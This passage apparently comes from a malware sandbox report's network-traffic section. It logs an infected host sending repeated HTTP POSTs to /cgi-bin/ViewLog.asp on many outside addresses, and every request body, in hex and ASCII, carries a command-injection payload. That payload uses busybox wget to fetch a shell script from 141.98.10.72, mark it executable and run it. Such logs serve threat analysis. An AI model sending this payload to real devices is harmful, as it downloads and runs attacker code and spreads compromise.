                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.184432030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.167035103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:51.388195992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.342492104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            159192.168.2.233521085.242.186.1178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.516520023 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            160192.168.2.234718085.73.19.1468080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.535125017 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            161192.168.2.235379031.44.141.898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.541766882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            162192.168.2.234030295.85.11.158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.692076921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.769603968 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:14.017395973 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:16.577048063 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.696348906 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.679024935 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:51.388164997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.342509031 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            163192.168.2.234991231.136.60.1888080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.712058067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.385648012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:13.729487896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:16.577058077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.952275991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:32.702765942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:55.483654022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:38.485657930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            164192.168.2.235215685.242.187.1248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.728957891 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            165192.168.2.233857895.255.253.1348080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.736103058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:11.954474926 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:28:11 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            166192.168.2.235052831.200.116.2218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.782527924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            167192.168.2.233686894.121.176.528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.782927036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            168192.168.2.236028894.121.213.1248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.783087969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            169192.168.2.234418294.122.112.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.789335012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            170192.168.2.235089695.86.73.368080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.798099995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
